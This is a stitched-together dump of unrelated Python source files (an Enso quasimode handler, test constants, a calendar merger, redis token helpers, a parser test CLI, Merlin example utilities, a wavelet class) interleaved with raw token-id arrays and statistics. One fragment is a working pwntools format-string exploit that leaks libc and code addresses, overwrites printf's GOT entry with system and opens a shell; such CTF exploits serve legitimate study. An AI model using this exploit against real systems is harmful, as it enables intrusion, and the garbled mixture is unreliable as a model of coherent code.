import traceback
from enso import messages
from enso import config
from enso import input
from enso.utils.strings import stringRatioBestMatch
from enso.utils.xml_tools import escape_xml
from enso.quasimode.suggestionlist import TheSuggestionList
from enso.quasimode.window import TheQuasimodeWindow
# Import the standard allowed key dictionary, which relates virtual
# key codes to character strings.
from enso.quasimode.charmaps import STANDARD_ALLOWED_KEYCODES \
as ALLOWED_KEYCODES
# ----------------------------------------------------------------------------
# TheQuasimode
# ----------------------------------------------------------------------------
class Quasimode:
    """
    Encapsulates the command quasimode state and event-handling.

    Future note: In code review, we realized that implementing the
    quasimode is an ideal case for the State pattern; the Quasimode
    singleton would have a private member for quasimode state, which
    would be an instance of one of two classes, InQuasimode or
    OutOfQuasimode, both descended from a QuasimodeState interface
    class.  Consequences of this include much cleaner transition code
    and separation of event handling into the two states.
    """

    # Singleton instance slot.
    # NOTE(review): two orphaned ``@classmethod`` decorators preceded
    # __init__ here (the singleton accessor classmethods they belonged
    # to appear to have been stripped from this chunk). They have been
    # removed: decorating __init__ with classmethod would break
    # instantiation of the class.
    __instance = None

    def __init__( self, eventManager, commandManager ):
        """
        Initialize the quasimode.
        """

        self.__cmdManager = commandManager

        # Boolean variable that records whether the quasimode key is
        # currently down, i.e., whether the user is "in the quasimode".
        self._inQuasimode = False

        # The QuasimodeWindow object that is responsible for
        # drawing the quasimode; set to None initially.
        # A QuasimodeWindow object is created at the beginning of
        # the quasimode, and destroyed at the completion of the
        # quasimode.
        self.__quasimodeWindow = None

        # The suggestion list object, which is responsible for
        # maintaining all the information about the auto-completed
        # command and suggested command names, and the text typed
        # by the user.
        self.__suggestionList = TheSuggestionList( self.__cmdManager )

        # Boolean variable that should be set to True whenever an event
        # occurs that requires the quasimode to be redrawn, and which
        # should be set to False when the quasimode is drawn.
        self.__needsRedraw = False

        # Whether the next redraw should redraw the entire quasimodal
        # display, or only the description and user text.
        self.__nextRedrawIsFull = False

        self.__eventMgr = eventManager

        # Register a key event responder, so that the quasimode can
        # actually respond to quasimode events.
        self.__eventMgr.registerResponder( self.onKeyEvent, "key" )

        # Creates new event types that code can subscribe to, to find out
        # when the quasimode (or mode) is started and completed.
        self.__eventMgr.createEventType( "startQuasimode" )
        self.__eventMgr.createEventType( "endQuasimode" )

        # Read settings from config file: are we modal?
        # What key activates the quasimode?
        # What keys exit and cancel the quasimode?
        # NOTE(review): setQuasimodeKeyByName is not defined in this
        # chunk — presumably defined elsewhere; confirm.
        self.setQuasimodeKeyByName( input.KEYCODE_QUASIMODE_START,
                                    config.QUASIMODE_START_KEY )
        self.setQuasimodeKeyByName( input.KEYCODE_QUASIMODE_END,
                                    config.QUASIMODE_END_KEY )
        self.setQuasimodeKeyByName( input.KEYCODE_QUASIMODE_CANCEL,
                                    config.QUASIMODE_CANCEL_KEY )

        self.__isModal = config.IS_QUASIMODE_MODAL
        self.__eventMgr.setModality( self.__isModal )

    def onKeyEvent( self, eventType, keyCode ):
        """
        Handles a key event of particular type.
        """

        if eventType == input.EVENT_KEY_QUASIMODE:
            if keyCode == input.KEYCODE_QUASIMODE_START:
                assert not self._inQuasimode
                self.__quasimodeBegin()
            elif keyCode == input.KEYCODE_QUASIMODE_END:
                assert self._inQuasimode
                self.__quasimodeEnd()
            elif keyCode == input.KEYCODE_QUASIMODE_CANCEL:
                self.__suggestionList.clearState()
                self.__quasimodeEnd()
        elif eventType == input.EVENT_KEY_DOWN and self._inQuasimode:
            # The user has typed a character, and we need to redraw the
            # quasimode.
            self.__needsRedraw = True

            if keyCode == input.KEYCODE_TAB:
                self.__suggestionList.autoType()
            elif keyCode == input.KEYCODE_RETURN:
                self.__suggestionList.autoType()
            elif keyCode == input.KEYCODE_ESCAPE:
                self.__suggestionList.clearState()
            elif keyCode == input.KEYCODE_BACK:
                # Backspace has been pressed.
                self.__onBackspace()
            elif keyCode == input.KEYCODE_DOWN:
                # The user has pressed the down arrow; change which of the
                # suggestions is "active" (i.e., will be executed upon
                # termination of the quasimode)
                self.__suggestionList.cycleActiveSuggestion( 1 )
                self.__nextRedrawIsFull = True
            elif keyCode == input.KEYCODE_UP:
                # Up arrow; change which suggestion is active.
                self.__suggestionList.cycleActiveSuggestion( -1 )
                self.__nextRedrawIsFull = True
            elif keyCode in ALLOWED_KEYCODES:
                # FIX: was ``ALLOWED_KEYCODES.has_key( keyCode )``;
                # dict.has_key was removed in Python 3 and ``in`` is the
                # idiomatic (and Python 2 compatible) membership test.
                # The user has typed a valid key to add to the userText.
                self.__addUserChar( keyCode )
            else:
                # The user has pressed a key that is not valid.
                pass

    def __addUserChar( self, keyCode ):
        """
        Adds the character corresponding to keyCode to the user text.
        """

        newCharacter = ALLOWED_KEYCODES[keyCode]
        oldUserText = self.__suggestionList.getUserText()
        self.__suggestionList.setUserText( oldUserText + newCharacter )

        # If the user had indicated one of the suggestions, then
        # typing a character snaps the active suggestion back to the
        # user text and auto-completion.
        self.__suggestionList.resetActiveSuggestion()

    def __onBackspace( self ):
        """
        Deletes one character, if possible, from the user text.
        """

        oldUserText = self.__suggestionList.getUserText()
        if len( oldUserText ) == 0:
            # There is no user text; backspace does nothing.
            return

        self.__suggestionList.setUserText( oldUserText[:-1] )

        # If the user had indicated anything on the suggestion list,
        # then hitting backspace snaps the active suggestion back to
        # the user text.
        self.__suggestionList.resetActiveSuggestion()

    def __quasimodeBegin( self ):
        """
        Executed when user presses the quasimode key.
        """

        assert not self._inQuasimode

        if self.__quasimodeWindow == None:
            logging.info( "Created a new quasimode window!" )
            self.__quasimodeWindow = TheQuasimodeWindow()

        self.__eventMgr.triggerEvent( "startQuasimode" )
        # Only respond to timer ticks (for redrawing) while the
        # quasimode is active; the responder is removed on exit.
        self.__eventMgr.registerResponder( self.__onTick, "timer" )

        self._inQuasimode = True
        self.__needsRedraw = True

        # Postcondition
        assert self._inQuasimode

    def __onTick( self, timePassed ):
        """
        Timer event responder.  Re-draws the quasimode, if it needs it.
        Only registered while in the quasimode.

        NOTE: Drawing the quasimode takes place in __onTick() for
        performance reasons.  If a user mashed down 10 keys in
        the space of a few milliseconds, and the quasimode was re-drawn
        on every single keystroke, then the quasimode could suddenly
        be lagging behind the user a half a second or more.
        """

        # So pychecker doesn't complain...
        dummy = timePassed

        assert self._inQuasimode

        if self.__needsRedraw:
            self.__needsRedraw = False
            self.__quasimodeWindow.update( self, self.__nextRedrawIsFull )
            self.__nextRedrawIsFull = False
        else:
            # If the quasimode hasn't changed, then continue drawing
            # any parts of it (such as the suggestion list) that
            # haven't been drawn/updated yet.
            self.__quasimodeWindow.continueDrawing()

    def __quasimodeEnd( self ):
        """
        Executed when user releases the quasimode key.
        """

        # The quasimode has terminated; remove the timer responder
        # function as an event responder.
        self.__eventMgr.triggerEvent( "endQuasimode" )
        self.__eventMgr.removeResponder( self.__onTick )

        # LONGTERM TODO: Determine whether deleting or hiding is better.
        logging.info( "Deleting the quasimode window." )
        # Delete the Quasimode window.
        del self.__quasimodeWindow
        self.__quasimodeWindow = None

        activeCommand = self.__suggestionList.getActiveCommand()
        userText = self.__suggestionList.getUserText()
        if activeCommand != None:
            cmdName = self.__suggestionList.getActiveCommandName()
            self.__executeCommand( activeCommand, cmdName )
        elif len( userText ) > config.BAD_COMMAND_MSG_MIN_CHARS:
            # The user typed some text, but there was no command match
            self.__showBadCommandMsg( userText )

        self._inQuasimode = False
        self.__suggestionList.clearState()

    def __executeCommand( self, cmd, cmdName ):
        """
        Attempts to execute the command.  Catches any errors raised by
        the command code and deals with them appropriately, e.g., by
        launching a bug report, informing the user, etc.

        Commands should deal with user-errors, like lack of selection,
        by displaying messages, etc.  Exceptions should only be raised
        when the command is actually broken, or code that the command
        calls is broken.
        """

        # The following message may be used by system tests.
        logging.info( "COMMAND EXECUTED: %s" % cmdName )
        try:
            cmd.run()
        except Exception:
            # An exception occured during the execution of the command.
            logging.error( "Command \"%s\" failed." % cmdName )
            logging.error( traceback.format_exc() )
            raise

    def __showBadCommandMsg( self, userText ):
        """
        Displays an error message telling the user that userText does
        not match any command.  Also, if there are any reasonable
        commands that were similar but not matching, offers those to
        the user as suggestions.
        """

        # Generate a caption for the message with a couple suggestions
        # for command names similar to the user's text
        caption = self.__commandSuggestionCaption( escape_xml( userText ) )
        badCmd = userText.lower()
        badCmd = escape_xml( badCmd )
        # Create and display a primary message.
        text = config.BAD_COMMAND_MSG
        text = text % ( badCmd, caption )
        messages.displayMessage( text )

    def __commandSuggestionCaption( self, userText ):
        """
        Creates and returns a caption suggesting one or two commands
        that are similar to userText.
        """

        # Retrieve one or two command name suggestions.
        suggestions = self.__cmdManager.retrieveSuggestions( userText )
        cmds = [ s.toText() for s in suggestions ]
        if len(cmds) > 0:
            ratioBestMatch = stringRatioBestMatch( userText.lower(), cmds )
            caption = config.ONE_SUGG_CAPTION
            caption = caption % ratioBestMatch
        else:
            # There were no suggestions; so we don't want a caption.
            caption = ""
        return caption
| [
2,
15069,
357,
66,
8,
3648,
11,
5524,
1143,
11,
3457,
13,
198,
2,
1439,
2489,
10395,
13,
198,
2,
220,
198,
2,
2297,
396,
3890,
290,
779,
287,
2723,
290,
13934,
5107,
11,
351,
393,
1231,
198,
2,
17613,
11,
389,
10431,
2810,
326,
... | 2.576548 | 5,637 |
# flake8: noqa

import wirepas_mesh_messaging

# Define list of default values used during testing
# Gateway / sink identity and result codes.
GATEWAY_ID = "test_gateway"
GATEWAY_STATE = wirepas_mesh_messaging.GatewayState.ONLINE
SINK_ID = "sink3"
RES_OK = wirepas_mesh_messaging.GatewayResultCode.GW_RES_OK
RES_KO = wirepas_mesh_messaging.GatewayResultCode.GW_RES_INTERNAL_ERROR
# Addressing / payload defaults for data messages.
REQUEST_ID = 1234567
DESTINATION_ADD = 5678
SOURCE_ADD = 1234
SOURCE_EP = 98
DESTINATION_EP = 127
QOS = 0
DATA_PAYLOAD = bytes(b"Test")
INITIAL_DELAY = 12
# Timing values are in milliseconds.
RX_TIME_MS_EPOCH = int(123456789)
TRAVEL_TIME_MS = 123
HOP_COUNT = 10
NETWORK_ADDRESS = 0x123456
IMPLEMENTED_API_VERSION = 0
# Todo add more fields in config
NODE_CONFIG_1 = dict([("sink_id", SINK_ID), ("node_address", 123)])
# Scratchpad (OTAP) fixtures.
SCRATCHPAD_SEQ = 12
SCRATCHPAD = bytes(bytearray(1024))
SCRATCHPAD_INFO = dict([("len", 2032), ("crc", 0x1234), ("seq", 112)])
SCRATCHPAD_TARGET_RAW = dict([("action", wirepas_mesh_messaging.ScratchpadAction.ACTION_PROPAGATE_AND_PROCESS),
                              ("target_sequence", 18),
                              ("param", 123)])
SCRATCHPAD_TARGET_DELAY = dict([("action", wirepas_mesh_messaging.ScratchpadAction.ACTION_PROPAGATE_AND_PROCESS_WITH_DELAY),
                                ("target_sequence", 18),
                                ("delay", wirepas_mesh_messaging.ProcessingDelay.DELAY_FIVE_DAYS)])
SCRATCHPAD_TARGET_MIN = dict([("action", wirepas_mesh_messaging.ScratchpadAction.ACTION_PROPAGATE_ONLY)])
SCRATCHPAD_STATUS = wirepas_mesh_messaging.ScratchpadStatus.SCRATCHPAD_STATUS_SUCCESS
SCRATCHPAD_TYPE = wirepas_mesh_messaging.ScratchpadType.SCRATCHPAD_TYPE_PRESENT
FIRMWARE_AREA_ID = 0x123456
| [
2,
781,
539,
23,
25,
645,
20402,
198,
198,
11748,
6503,
44429,
62,
76,
5069,
62,
37348,
3039,
198,
198,
2,
2896,
500,
1351,
286,
4277,
3815,
973,
1141,
4856,
198,
38,
6158,
27285,
62,
2389,
796,
366,
9288,
62,
10494,
1014,
1,
198,... | 2.205962 | 738 |
from ics import Calendar
from urllib.request import urlopen

# Public iCal feeds to merge; events from the second calendar are folded
# into the first.
url1 = "https://calendar.google.com/calendar/ical/marcel%40intuitionmachines.com/public/basic.ics"
url2 = "https://calendar.google.com/calendar/ical/dreamflasher%40dreamflasher.de/public/basic.ics"

# Download and parse both feeds (network I/O happens here).
c1 = Calendar(urlopen(url1).read().decode())
c2 = Calendar(urlopen(url2).read().decode())

# Merge every event from the second calendar into the first.
for e in c2.events:
    c1.events.add(e)

# Serialize the merged calendar. NOTE(review): writelines(c1) relies on
# iterating a Calendar yielding its ics-formatted lines — presumably the
# ics package supports this; confirm against its documentation.
with open('calendar.ics', 'w') as f:
    f.writelines(c1)
| [
6738,
220,
873,
1330,
26506,
198,
6738,
2956,
297,
571,
13,
25927,
1330,
19016,
9654,
198,
6371,
16,
796,
366,
5450,
1378,
9948,
9239,
13,
13297,
13,
785,
14,
9948,
9239,
14,
605,
14,
3876,
5276,
4,
1821,
600,
84,
653,
76,
620,
11... | 2.565714 | 175 |
from django.shortcuts import render
from rest_framework import viewsets
from rest_framework.filters import SearchFilter,OrderingFilter
from rest_framework.pagination import LimitOffsetPagination, PageNumberPagination,CursorPagination
from .pagination import PersonPageNumberPagination,PersonLimitOffsetPagination,PersonCursorPagination
from .models import Person
from .serializers import PersonSerializer
# View with global pagenumber pagination
| [
6738,
42625,
14208,
13,
19509,
23779,
1330,
8543,
198,
6738,
1334,
62,
30604,
1330,
5009,
1039,
198,
6738,
1334,
62,
30604,
13,
10379,
1010,
1330,
11140,
22417,
11,
18743,
278,
22417,
198,
6738,
1334,
62,
30604,
13,
79,
363,
1883,
1330,... | 3.847458 | 118 |
import yaml
__all__ = ['Renderer', 'StatusRenderer']
| [
11748,
331,
43695,
198,
198,
834,
439,
834,
796,
37250,
49,
437,
11882,
3256,
705,
19580,
49,
437,
11882,
20520,
628,
198
] | 2.545455 | 22 |
from django.db import transaction
from api.management.data_script import OperationalDataScript
from api.models.NotionalTransferType import NotionalTransferType
class AddNotionalTransferTypes(OperationalDataScript):
"""
Adds Notional Transfer Types
"""
is_revertable = False
comment = 'Adds Notional Transfer Types'
@transaction.atomic
script_class = AddNotionalTransferTypes
| [
6738,
42625,
14208,
13,
9945,
1330,
8611,
198,
198,
6738,
40391,
13,
27604,
13,
7890,
62,
12048,
1330,
6564,
864,
6601,
7391,
198,
6738,
40391,
13,
27530,
13,
3673,
1538,
43260,
6030,
1330,
1892,
1538,
43260,
6030,
628,
198,
4871,
3060,... | 3.513043 | 115 |
#!/usr/bin/env python3
"""
Usage: poetry run test_parser FR production
"""
import datetime
import logging
import pprint
import time
import arrow
import click
from parsers.lib.parsers import PARSER_KEY_TO_DICT
from parsers.lib.quality import (
ValidationError,
validate_consumption,
validate_exchange,
validate_production,
)
# Module-level logger; basicConfig is applied at import time so the CLI
# emits timestamped, DEBUG-level records from all parsers.
logger = logging.getLogger(__name__)
logging.basicConfig(
    level=logging.DEBUG, format="%(asctime)s %(levelname)-8s %(name)-30s %(message)s"
)
@click.command()
@click.argument("zone")
@click.argument("data-type", default="production")
@click.option("--target_datetime", default=None, show_default=True)
def test_parser(zone, data_type, target_datetime):
    """\b
    Parameters
    ----------
    zone: a two letter zone from the map
    data_type: in ['production', 'exchangeForecast', 'production', 'exchange',
      'price', 'consumption', 'generationForecast', 'consumptionForecast']
    target_datetime: string parseable by arrow, such as 2018-05-30 15:00
    \b
    Examples
    -------
    >>> poetry run test_parser FR
    >>> poetry run test_parser FR production
    >>> poetry run test_parser NO-NO3-\>SE exchange
    >>> poetry run test_parser GE production --target_datetime="2022-04-10 15:00"
    """
    if target_datetime:
        target_datetime = arrow.get(target_datetime).datetime
    start = time.time()
    # Look up the parser callable registered for this (data_type, zone) pair.
    parser = PARSER_KEY_TO_DICT[data_type][zone]
    # Exchange zones are written "A->B"; the parser takes both ends as args.
    if data_type in ["exchange", "exchangeForecast"]:
        args = zone.split("->")
    else:
        args = [zone]
    res = parser(
        *args, target_datetime=target_datetime, logger=logging.getLogger(__name__)
    )
    if not res:
        raise ValueError("Error: parser returned nothing ({})".format(res))
    elapsed_time = time.time() - start
    # Normalize the parser output to a list of event dicts.
    if isinstance(res, (list, tuple)):
        res_list = list(res)
    else:
        res_list = [res]
    try:
        dts = [e["datetime"] for e in res_list]
    except (KeyError, TypeError):
        # KeyError: an event is missing the key; TypeError: an event is not a dict.
        # (Was a bare `except:`, which also swallowed KeyboardInterrupt.)
        raise ValueError(
            "Parser output lacks `datetime` key for at least some of the "
            "output. Full output: \n\n{}\n".format(res)
        )
    assert all(
        [type(e["datetime"]) is datetime.datetime for e in res_list]
    ), "Datetimes must be returned as native datetime.datetime objects"
    last_dt = arrow.get(max(dts)).to("UTC")
    first_dt = arrow.get(min(dts)).to("UTC")
    max_dt_warning = ""
    # Freshness warning only applies to live (non-historical) fetches.
    if not target_datetime:
        max_dt_warning = (
            " :( >2h from now !!!"
            if (arrow.utcnow() - last_dt).total_seconds() > 2 * 3600
            else " -- OK, <2h from now :) (now={} UTC)".format(arrow.utcnow())
        )
    print("Parser result:")
    pp = pprint.PrettyPrinter(width=120)
    pp.pprint(res)
    print(
        "\n".join(
            [
                "---------------------",
                "took {:.2f}s".format(elapsed_time),
                "min returned datetime: {} UTC".format(first_dt),
                "max returned datetime: {} UTC {}".format(last_dt, max_dt_warning),
            ]
        )
    )
    # Run the matching quality validator over every event; log (don't raise)
    # so a single bad event doesn't hide the rest of the report.
    if isinstance(res, dict):
        res = [res]
    for event in res:
        try:
            if data_type == "production":
                validate_production(event, zone)
            elif data_type == "consumption":
                validate_consumption(event, zone)
            elif data_type == "exchange":
                validate_exchange(event, zone)
        except ValidationError as e:
            logger.warning("Validation failed @ {}: {}".format(event["datetime"], e))
if __name__ == "__main__":
    # pylint: disable=no-value-for-parameter
    print(test_parser())
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
37811,
198,
28350,
25,
19518,
1057,
1332,
62,
48610,
8782,
3227,
198,
37811,
198,
198,
11748,
4818,
8079,
198,
11748,
18931,
198,
11748,
279,
4798,
198,
11748,
640,
198,
198,
11748,
... | 2.332476 | 1,555 |
# -*- coding: utf-8 -*-
__author__ = 'vincent'
import uuid
import json
from redis_help import redis_client
from werkzeug.security import generate_password_hash, check_password_hash
from . import redis_help
# 下面这个包 itsdangerous 用于生成确认令牌
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
def generate_auth_token(secret_key, user_id, expire=3600):
    """Create a signed token embedding the user id, valid for `expire` seconds."""
    serializer = Serializer(secret_key, expires_in=expire)
    # 'xid' is a random nonce so every issued token is unique, even for the
    # same user id.
    payload = {'id': user_id, 'xid': uuid.uuid4().hex}
    return serializer.dumps(payload)
def verify_auth_token(secret_key, token):
    """Decode a signed user token.

    Returns the cached auth entry for the decoded payload, or None when the
    token is invalid, tampered with, or expired.
    """
    s = Serializer(secret_key)
    try:
        data = s.loads(token)
    except Exception:
        # Any decode failure (bad signature, expired, malformed) means the
        # caller is unauthenticated. (Was a bare `except:`, which also
        # swallowed KeyboardInterrupt/SystemExit.)
        return None
    return redis_help.get('auth:token:{}'.format(data))
def set_token_cache(key, expire, **kwargs):
    """Store token metadata as a redis hash and set its TTL.

    Both commands are queued on one pipeline so they reach redis in a single
    round-trip. `kwargs` must be a flat mapping of string-valued fields.
    """
    pipe = redis_client.pipeline()
    # Order matters: the hash must exist before EXPIRE can attach a TTL to it.
    pipe.hmset(key, kwargs)
    pipe.expire(key, expire)
    pipe.execute()
def get_token_cache(key):
    """Fetch every cached field of the token hash; None when nothing is stored."""
    cached = redis_client.hgetall(key)
    # hgetall returns an empty mapping for a missing key; normalize to None.
    return cached if cached else None
def delete_token_cache(key):
    """Drop the cached token hash from redis (no-op if absent)."""
    redis_client.delete(key)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
834,
9800,
834,
796,
705,
7114,
1087,
6,
198,
198,
11748,
334,
27112,
198,
11748,
33918,
198,
6738,
2266,
271,
62,
16794,
1330,
2266,
271,
62,
16366,
198,
198,
6738,
2... | 1.628931 | 795 |
import time
from redis.exceptions import WatchError
| [
11748,
640,
198,
198,
6738,
2266,
271,
13,
1069,
11755,
1330,
6305,
12331,
628
] | 3.857143 | 14 |
"""user bank updates
Revision ID: 273b8bcef694
Revises: 2e02a681aeaa
Create Date: 2021-06-22 17:22:00.102134
"""
import logging
from alembic import op
import sqlalchemy as sa
from sqlalchemy.orm import sessionmaker
logger = logging.getLogger(__name__)
# revision identifiers, used by Alembic.
revision = "273b8bcef694"
down_revision = "2e02a681aeaa"
branch_labels = None
depends_on = None
Session = sessionmaker()
| [
37811,
7220,
3331,
5992,
198,
198,
18009,
1166,
4522,
25,
38549,
65,
23,
65,
344,
69,
45214,
198,
18009,
2696,
25,
362,
68,
2999,
64,
48564,
3609,
7252,
198,
16447,
7536,
25,
33448,
12,
3312,
12,
1828,
1596,
25,
1828,
25,
405,
13,
... | 2.733766 | 154 |
from datetime import date #Importa biblioteca para pegar data e hora do pc
# Challenge 032: decide whether a year is a leap year.
print('='*6, 'DESAFIO 032 - ANO BISSEXTO', '='*6)
# Entering 0 means "use the current year" from the system clock.
ano = int(input('| Digite o ano que quer analisar ou digite 0 para analisar o ano atual: '))
if not ano:
    ano = date.today().year
# Gregorian rule: divisible by 4 and not by 100, or divisible by 400.
eh_bissexto = (ano % 4 == 0 and ano % 100 != 0) or ano % 400 == 0
if eh_bissexto:
    print(f'O ano {ano} é BISSEXTO!')
else:
    print(f'O ano {ano} não é BISSEXTO!')
| [
6738,
4818,
8079,
1330,
3128,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
20939,
64,
275,
29142,
313,
31047,
31215,
61... | 2.087324 | 355 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.bthe_b import bthe_b
def test_bthe_b():
  """Test module bthe_b.py by downloading
  bthe_b.csv and testing shape of
  extracted data has 100 rows and 8 columns
  """
  test_path = tempfile.mkdtemp()
  x_train, metadata = bthe_b(test_path)
  try:
    assert x_train.shape == (100, 8)
  except:
    # Clean up the downloaded data before propagating the failure, then
    # re-raise the original exception. (Was `raise()`, which raises a
    # TypeError instead of re-raising the active exception.)
    shutil.rmtree(test_path)
    raise
| [
6738,
11593,
37443,
834,
1330,
4112,
62,
11748,
198,
6738,
11593,
37443,
834,
1330,
7297,
198,
6738,
11593,
37443,
834,
1330,
3601,
62,
8818,
198,
198,
11748,
4423,
346,
198,
11748,
25064,
198,
11748,
20218,
7753,
198,
198,
6738,
13050,
... | 2.865169 | 178 |
from pwncli import *
# Parse CLI options and populate the global `gift` mapping (io / elf / libc
# handles) provided by pwncli.
cli_script()
p = gift['io']
e = gift['elf']
# In debug mode pwncli supplies the local libc; otherwise use the known
# remote libc 2.23 build from the LibcSearcher database.
if gift['debug']:
    libc = gift['libc']
else:
    libc = ELF("/root/LibcSearcher/libc-database/other_libc_so/libc-2.23.so")
# Stage 1: format-string leak. Positional args 41 and 43 on the stack hold a
# binary code address and a libc return address respectively.
p.sendline("%41$p,%43$p")
msg = p.recvline()
code_addr, libc_addr = msg.split(b",")
# NOTE(review): the constants 74 and 240 are the distances from the leaked
# addresses to main / __libc_start_main for this exact binary+libc pair --
# confirm if either binary changes.
code_base_addr = int16(code_addr.decode()) - e.sym['main'] - 74
libc_base_addr = int16(libc_addr.decode()) - libc.sym['__libc_start_main'] - 240
e.address = code_base_addr
libc.address = libc_base_addr
log_address("code_base_addr", code_base_addr)
# Stage 2: format-string write. Overwrite printf@GOT with system() using
# short (2-byte) writes, so a later printf(buf) call becomes system(buf).
payload = fmtstr_payload(offset=6, writes={e.got['printf']:libc.sym['system']}, write_size="short", write_size_max="short")
p.sendline(payload)
sleep(1)
# The hijacked printf now runs system("/bin/sh").
p.sendline("/bin/sh")
p.interactive()
6738,
279,
675,
44506,
1330,
1635,
198,
198,
44506,
62,
12048,
3419,
198,
198,
79,
796,
6979,
17816,
952,
20520,
198,
68,
796,
6979,
17816,
7046,
20520,
198,
198,
361,
6979,
17816,
24442,
6,
5974,
198,
220,
220,
220,
9195,
66,
796,
... | 2.297468 | 316 |
###############################################################################
# Copyright (c) 2019, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory
# Written by the Merlin dev team, listed in the CONTRIBUTORS file.
# <merlin@llnl.gov>
#
# LLNL-CODE-797170
# All rights reserved.
# This file is part of Merlin, Version: 1.5.0.
#
# For details, see https://github.com/LLNL/merlin.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
###############################################################################
"""
This module contains a list of examples that can be used when learning to use
Merlin, or for setting up new workflows.
Examples are packaged in directories, with the directory name denoting
the example name. This must match the name of the merlin specification inside.
"""
import glob
import logging
import os
import shutil
import tabulate
import yaml
from merlin.examples import examples
LOG = logging.getLogger(__name__)
EXAMPLES_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), "workflows")
def write_example(src_path, dst_path):
    """
    Copy an example workflow to its destination.

    :param src_path: The file or directory to copy from.
    :param dst_path: The path the copy is written to.
    """
    # A directory needs a recursive copy; a single file a plain one.
    copier = shutil.copytree if os.path.isdir(src_path) else shutil.copy
    copier(src_path, dst_path)
def list_examples():
    """Return a printable table of every bundled example's name and description."""
    headers = ["name", "description"]
    rows = []
    for example_dir in gather_example_dirs():
        # Trailing os.sep (joining with "") so the glob stays inside the dir.
        directory = os.path.join(os.path.join(EXAMPLES_DIR, example_dir), "")
        specs = glob.glob(directory + "*.yaml")
        for spec in specs:
            with open(spec) as f:
                try:
                    spec_metadata = yaml.safe_load(f)["description"]
                except KeyError:
                    # Spec exists but has no 'description' section: report and skip.
                    # (logger.warn is deprecated; use warning.)
                    LOG.warning(f"{spec} lacks required section 'description'")
                    continue
                except TypeError:
                    # File parsed to a non-mapping (e.g. empty yaml); skip silently.
                    continue
            rows.append([spec_metadata["name"], spec_metadata["description"]])
    return "\n" + tabulate.tabulate(rows, headers) + "\n"
def setup_example(name, outdir):
    """
    Copy the named example into `outdir`.

    :param name: The example spec name (basename of its yaml file).
    :param outdir: Destination directory, relative to the current working
        directory; when falsy, a directory named after the example is used.
        Must not already exist.
    :return: The example's directory name, or None on failure.
    """
    example = None
    spec_paths = gather_all_examples()
    for spec_path in spec_paths:
        spec = os.path.basename(os.path.normpath(spec_path)).replace(".yaml", "")
        if name == spec:
            example = os.path.basename(os.path.dirname(spec_path))
            break
    if example is None:
        LOG.error(f"Example '{name}' not found.")
        return None
    # if there is only 1 file in the example, don't bother making a directory for it
    if len(os.listdir(os.path.dirname(spec_path))) == 1:
        src_path = os.path.join(EXAMPLES_DIR, os.path.join(example, example + ".yaml"))
    else:
        src_path = os.path.join(EXAMPLES_DIR, example)
    if outdir:
        outdir = os.path.join(os.getcwd(), outdir)
    else:
        outdir = os.path.join(os.getcwd(), example)
    if os.path.exists(outdir):
        LOG.error(f"File '{outdir}' already exists!")
        return None
    # (Removed an unreachable `if outdir is None:` branch -- both paths above
    # always assign a non-None outdir.)
    LOG.info(f"Copying example '{name}' to {outdir}")
    write_example(src_path, outdir)
    return example
| [
29113,
29113,
7804,
4242,
21017,
198,
2,
15069,
357,
66,
8,
13130,
11,
13914,
45036,
3549,
2351,
4765,
11,
11419,
13,
198,
2,
21522,
771,
379,
262,
13914,
45036,
3549,
2351,
18643,
198,
2,
22503,
416,
262,
32918,
1614,
1074,
11,
5610,... | 2.768793 | 1,583 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from Commands.PythonCommandBase import PythonCommand, ImageProcPythonCommand
from Commands.Keys import KeyPress, Button, Direction, Stick, Hat | [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
6738,
49505,
13,
37906,
21575,
14881,
1330,
11361,
21575,
11,
7412,
2964,
66,
37906,
21575,
198,
6738,
49505,
... | 3.392857 | 56 |
from .signal import *
__all__ = ["orthogonal_wavelet", "DAUBECHIES_D4"]
class orthogonal_wavelet:
    """Orthogonal wavelet consisting of a scaling (low-pass) filter and a wavelet (high-pass) filter that together form a conjugate mirror filter (CMF) pair."""
    # NOTE(review): no __init__ is visible in this chunk; the constructor and
    # the self.scaling_filter / self.wavelet_filter attributes used below are
    # presumably defined elsewhere in the file -- confirm.
    @staticmethod
    def from_scaling_filter(scaling_filter):
        """Construct orthogonal wavelet from scaling filter."""
        # could also use scipy.signal.qmf() and translate manually
        # Derive the CMF partner: conjugate, modulate by (-1)^n, shift, reverse.
        wavelet_filter = -scaling_filter.conj().modulate(-1.0).shift(-1).reverse()
        return orthogonal_wavelet(scaling_filter, wavelet_filter)
    @staticmethod
    def from_wavelet_filter(wavelet_filter):
        """Construct orthogonal wavelet from wavelet filter."""
        # Inverse of from_scaling_filter's derivation (same steps, undone in
        # reverse order).
        scaling_filter = -wavelet_filter.reverse().shift(1).modulate(-1.0).conj()
        return orthogonal_wavelet(scaling_filter, wavelet_filter)
